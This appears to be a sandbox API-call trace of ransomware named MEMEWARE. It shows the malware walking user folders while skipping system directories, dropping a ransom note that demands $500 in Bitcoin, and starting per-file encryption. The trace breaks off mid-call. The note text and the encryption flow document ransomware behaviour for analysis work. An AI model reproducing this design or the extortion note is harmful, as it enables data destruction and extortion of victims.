0x47ba10 [0085.986] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.986] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.986] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.986] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.986] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\.") returned 64 [0085.986] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.986] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.986] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.986] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.986] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.986] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.986] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\..") returned 65 [0085.986] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.987] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.987] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0085.987] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0085.987] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\RESTORE_FILES.txt") returned 80 [0085.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0085.987] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.987] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0085.988] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.988] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0085.988] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.988] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0085.988] CloseHandle (hObject=0xd4) returned 1 [0085.990] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0085.990] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla") returned 55 [0085.990] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0085.990] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0085.990] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*") returned 57 [0085.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0085.990] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.990] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.990] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.990] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.990] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.990] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\.") returned 57 [0085.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.990] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.990] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.990] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.990] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.990] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.990] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.990] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\..") returned 58 [0085.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.990] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.990] lstrcmpiW (lpString1="Firefox", lpString2="Windows") returned -1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="Program Files") returned -1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="Program Files (x86)") returned -1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="$Recycle.bin") returned 1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="System Volume Information") returned -1 [0085.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox") returned 63 [0085.991] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0085.991] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0085.991] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*") returned 65 [0085.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.015] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.015] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.015] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.015] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.015] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.015] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\.") returned 65 [0086.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.015] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.015] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\..") returned 66 [0086.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.015] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0086.015] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 72 [0086.015] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0086.015] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0086.015] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*") returned 74 [0086.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.016] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.016] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\.") returned 74 [0086.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.016] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.016] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.016] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.016] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.016] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.016] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\..") returned 75 [0086.016] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.016] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="Windows") returned -1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files") returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files (x86)") returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="$Recycle.bin") returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="System Volume Information") returned -1 [0086.016] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 89 [0086.016] lstrcmpW (lpString1="silmbjec.default", lpString2=".") returned 1 [0086.016] lstrcmpW (lpString1="silmbjec.default", lpString2="..") returned 1 [0086.017] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*") returned 91 [0086.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.046] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.046] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.046] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.046] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.046] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.046] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\.") returned 91 [0086.046] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.046] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.046] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.046] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.046] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.046] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.046] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.046] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\..") returned 92 [0086.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.046] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0086.046] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned 95 [0086.046] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0086.046] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0086.047] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*") returned 97 [0086.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\.") returned 97 [0086.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.049] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\..") returned 98 [0086.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.049] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.049] lstrcmpiW (lpString1="0", lpString2="Windows") returned -1 [0086.049] lstrcmpiW (lpString1="0", lpString2="Program Files") returned -1 [0086.049] lstrcmpiW (lpString1="0", lpString2="Program Files (x86)") returned -1 [0086.049] lstrcmpiW (lpString1="0", lpString2="$Recycle.bin") returned 1 [0086.049] lstrcmpiW (lpString1="0", lpString2="System Volume Information") returned -1 [0086.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned 97 [0086.049] lstrcmpW (lpString1="0", lpString2=".") returned 1 [0086.049] lstrcmpW (lpString1="0", lpString2="..") returned 1 [0086.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\*") returned 99 [0086.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\.") returned 99 [0086.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.050] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.050] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.050] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.050] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.050] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.050] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\..") returned 100 [0086.050] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.050] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.050] lstrcmpiW (lpString1="98", lpString2="Windows") returned -1 [0086.050] lstrcmpiW (lpString1="98", lpString2="Program Files") returned -1 [0086.050] lstrcmpiW (lpString1="98", lpString2="Program Files (x86)") returned -1 [0086.050] lstrcmpiW (lpString1="98", lpString2="$Recycle.bin") returned 1 [0086.050] lstrcmpiW (lpString1="98", lpString2="System Volume Information") returned -1 [0086.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned 100 [0086.050] lstrcmpW (lpString1="98", lpString2=".") returned 1 [0086.050] lstrcmpW (lpString1="98", lpString2="..") returned 1 [0086.051] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\*") returned 102 [0086.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.052] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.052] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.052] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.052] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.052] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.052] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\.") returned 102 [0086.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.052] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.052] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.052] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.052] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.052] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.052] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.052] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\..") returned 103 [0086.052] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.052] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.052] lstrcmpiW (lpString1="B60F3d01", lpString2="Windows") returned -1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="Program Files") returned -1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="Program Files (x86)") returned -1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="$Recycle.bin") returned 1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="System Volume Information") returned -1 [0086.053] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.053] StrStrIW (lpFirst="B60F3d01", lpSrch=".protected") returned 0x0 [0086.053] lstrcmpW (lpString1="B60F3d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js 